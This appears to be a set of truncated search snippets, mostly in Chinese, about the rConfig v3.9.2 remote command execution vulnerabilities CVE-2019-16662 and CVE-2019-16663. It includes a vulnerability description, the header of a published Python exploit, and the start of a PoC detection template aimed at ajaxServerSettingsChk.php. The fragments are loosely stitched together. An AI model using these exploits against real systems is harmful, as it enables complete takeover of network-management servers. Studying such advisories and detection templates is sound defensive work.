CVE编号:CVE-2019-16662 漏洞类型:远程命令执行(RCE) 影响范围:rConfig v3.9.2版本 漏洞影响:攻击者可以通过该漏洞执行任意命令,完全控制受影响的系统。 rconfig远程命令执行的工作原理: rConfig是一个开源的网络设备配置管理实用工具,它包含多个PHP脚本,用于处理用户的请求和管理网络设备配置。 在CVE-2019-16662漏洞...
rConfig v3.9.2 authenticated and unauthenticated RCE (CVE-2019-16663) and (CVE-2019-16662) 原文:https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ 关于rConfig rConfig是一个开放源码的网络设备配置管理实用工具,用于网络工程师对网络设备的配置。
/usr/bin/python# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution# Date: 18/09/2019# Exploit Author: Askar (@mohammadaskar2)# CVE : CVE-2019-16663# Vendor Homepage: https://rconfig.com/# Software link: https://rconfig.com/download# Version: v3.9.2# Tested on: CentOS ...
随后,我们顺着Github找到了该系统得源码,然后找到了最新的漏洞修复补丁,其中更新的部分代码如下: name: poc-yaml-rconfig-cve-2019-16663 set: r: randomInt(800000000, 1000000000) r1: randomInt(800000000, 1000000000) rules: - method: GET path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname...